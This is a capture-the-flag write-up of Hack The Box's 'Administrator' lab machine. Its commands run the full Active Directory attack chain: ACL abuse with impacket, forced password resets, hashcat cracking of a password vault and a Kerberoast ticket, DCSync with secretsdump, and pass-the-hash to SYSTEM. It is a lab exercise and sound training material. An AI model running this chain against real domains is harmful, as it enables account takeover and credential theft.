Administrator Write-Up - Hacking Write-ups

![[Hack The Box/Administrator/IntroImage.png]] ## Summary of Exploitation Hey all! today I pwned Administrator from Hack The Box. This was an awesome machine. I started with some provided creds for a low level user. After thorough enumeration, I was able to pivot from Olivia to another user, then another user that had ftp access. Inside the ftp I was able to crack the hash of a password storage vault key, granting me the password of yet another user. Afterwards, I was able to do a targeted Kerberoast attack and takeover the final user that had DCSync rights leading to nt Authority\System. ## Recon Phase As always, I start with my tried and true nmap scan! ``` sudo nmap -sC -sV -p- --min-rate 10000 10.129.193.174 -oA nmap-out ``` ![[Hack The Box/Administrator/nmap.png]] | Port | Protocol | Protocol Details | | ---- | -------- | ---------------- | | 21 | FTP | Microsoft ftpd | | 53 | DNS | Simple DNS plus | | 88 | Kerberos | Kerberos | | 135 | RPC | RPC | | 139 | NETBIOS | NETBIOS | | 389 | LDAP | LDAP | | 445 | SMB | SMB | This appears to be a surprisingly tame Windows Domain Controller with the exception of the FTP port. The domain is administrator.htb. I'm going to go ahead and add the domain to my /etc/hosts file. ![[Hack The Box/Administrator/etcHosts.png]] In the "Machine Information" panel, I was granted a user account: olivia / ichliebedich. I'm going to immediately use these to dump all the LDAP information and setup my bloodhound. ``` ldapdomaindump -u administrator.htb\\Olivia -p ichliebedich 10.129.193.174 -o . ``` ![[Hack The Box/Administrator/ldapdump.png]] I'll check out the domain users html file and see what we are dealing with. ![[Hack The Box/Administrator/users.png]] Looks like I have 6 active users, I believe this machine is mission impossible themed. The last one I did was "The Office" themed. I'm going to add these active users to my users.txt file. ![[Hack The Box/Administrator/usersText.png]] Now I'm going to collect all my bloodhound information using bloodhound-python. ``` bloodhound-python -c ALL -u olivia -p ichliebedich -d administrator.htb -dc administrator.htb -ns 10.129.193.174 ``` ![[bloodhoundInfo.png]] Ill start up my neo4j server, launch bloodhound and import all my collected data. ``` sudo neo4j start bloodhound ``` ![[uploadBLood.png]] I'll a look at what Olivia has to offer and I immediately find my path. ![[bloodhoundPath.png]] Olivia has GenericAll on Michael, I can leverage this to change his password thus taking over his account. Michael then has ForceChangePassword permissions on Benjamin. But wait! It gets better! ![[EmilyGenWrite.png]] Emily, has GenericWrite on Ethan, I can leverage that and maybe do a targeted Kerberoast attack on Ethan. ![[EthanDcSync.png]] And Ethan has DCSync on the domain. So done deal. Lets see what we can do... ![[crackknuckles.gif]] ## PrivEsc to Emily I'll start with compromising Michaels account using impacket. ``` impacket-owneredit -action write -new-owner 'olivia' -target-dn 'CN=MICHAEL WILLIAMS,CN=USERS,DC=ADMINISTRATOR,DC=HTB' 'administrator.htb'/'olivia':'ichliebedich' -dc-ip 10.129.193.174 ``` ![[ownerMike.png]] I'm going to use impacket again to Write the ACL. ``` impacket-dacledit -action 'write' -rights 'FullControl' -principal 'olivia' -target-dn 'CN=MICHAEL WILLIAMS,CN=USERS,DC=ADMINISTRATOR,DC=HTB' 'administrator.htb'/'olivia':'ichliebedich' -dc-ip 10.129.193.174 ``` ![[dacl.png]] And lastly, use net rpc to write the new password. ``` net rpc password michael 'password123*' -U administrator.htb/olivia%'ichliebedich' -S 10.129.193.174 ``` I'll get nothing back, but If I check netexec, it'll work fine :) ![[mikeHacked.png]] Now I can get Benjamin, but this time I can cut out the middle man and use net rpc directly. ``` net rpc password benjamin 'password123*' -U administrator.htb/michael%'password123*' -S 10.129.193.174 ``` I will again get nothing back, but no news is good news! ![[BenjaminHacked.png]] After some light recon, I recalled the FTP port and tried Benjamins credentials. ``` > ftp 10.129.193.174 Connected to 10.129.193.174. 220 Microsoft FTP Service Name (10.129.193.174:kali): Benjamin 331 Password required Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 229 Entering Extended Passive Mode (|||62551|) 125 Data connection already open; Transfer starting. 10-05-24 08:13AM 952 Backup.psafe3 226 Transfer complete. ``` Nice! there is a psafe3 file in here. psafe3 is very similar to a keypass database. I'll `get` the file and try to crack it using hashcat. ``` hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt ``` ![[CrackedKee.png]] It cracked to "tekieromucho". I went ahead and downloaded the application for linux from the website [here](https://sourceforge.net/projects/passwordsafe/files/Linux/) and loaded it up passing the backup file and the cracked password. ![[passwordSafe.png]] I clicked ok, and I was in! ![[passwordSafeIn.png]] I wanted Emily's password, So I copied it to my clipboard and pasted it in my password file. ![[passwordFile.png]] ## PrivEsc to nt/Authority System Now that I have Emily, I can focus on getting Ethan using a targeted Kerberoast attack. It's easiest to do this logged in via Evil-Winrm. ``` evil-winrm -i 10.129.193.174 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' ``` ![[winrmEmily.png]] I'm going to need PowerView.ps1 for this, So Ill copy it to the directory my winrm session is active in and use the Evil-Winrm upload feature. ``` cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 . upload PowerView.ps1 ``` ![[uploadSucess.png]] I'll import the modules. ``` *Evil-WinRM* PS C:\Users\emily\Documents> Import-Module ./PowerView.ps1 *Evil-WinRM* PS C:\Users\emily\Documents> . ./PowerView.ps1 ``` Now to pull this off, I'll first need to add an SPN to ethans account. ``` *Evil-WinRM* PS C:\Users\emily\Documents> setspn -a MSSQLSvc/administrator.htb:1433 administrator.htb\ethan Checking domain DC=administrator,DC=htb Registering ServicePrincipalNames for CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb MSSQLSvc/administrator.htb:1433 Updated object ``` I can verify with Get-DomainUser. ``` *Evil-WinRM* PS C:\Users\emily\Documents> Get-DomainUser ethan | Select serviceprincipalname serviceprincipalname -------------------- MSSQLSvc/administrator.htb:1433 ``` Now I can get a ticket using Get-DomainSPNTicket and Emily's credentials. ``` $pass = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $pass) Get-DomainSPNTicket -SPN "MSSQLSvc/administrator.htb:1433" -Credential $Cred ``` ![[ticket.png]] Nice, I got Ethans ticket, now I cross my fingers and hope it cracks! ``` echo '$krb5tgs$23$*UNKNOWN$UNKNOWN$MSSQLSvc/administrator.htb:1433*$E50706B0C6CC.... > ethan.hash hashcat -m 13100 -a 0 ethan.hash /usr/share/wordlists/rockyou.txt ``` ![[CrackedEthan.png]] Put yo hands up! limpbizkit. Since Ethan has DCSync ability, I can use impackets-secretsdump to get the administrators NTLM hash. ``` impacket-secretsdump [email protected] ``` ![[AllThere.png]] All I need is this "aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e" I can pass the hash using impacket-psexec to get nt Authority\System. ``` impacket-psexec [email protected] -hashes "aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e" -dc-ip 10.129.193.174 ``` ![[DoneAndDone.png]] And grab the user and root hash. ``` C:\Windows\system32> type C:\users\emily\desktop\user.txt bbb43a************************** C:\Windows\system32> type C:\users\administrator\desktop\root.txt 634122************************** ``` Done and Done, This was a fun machine, GenericWrite can be a pain if you can't find the way forward. but I got lucky that the kerberos ticket was crackable. Anyways, Thanks for reading! Happy Hacking!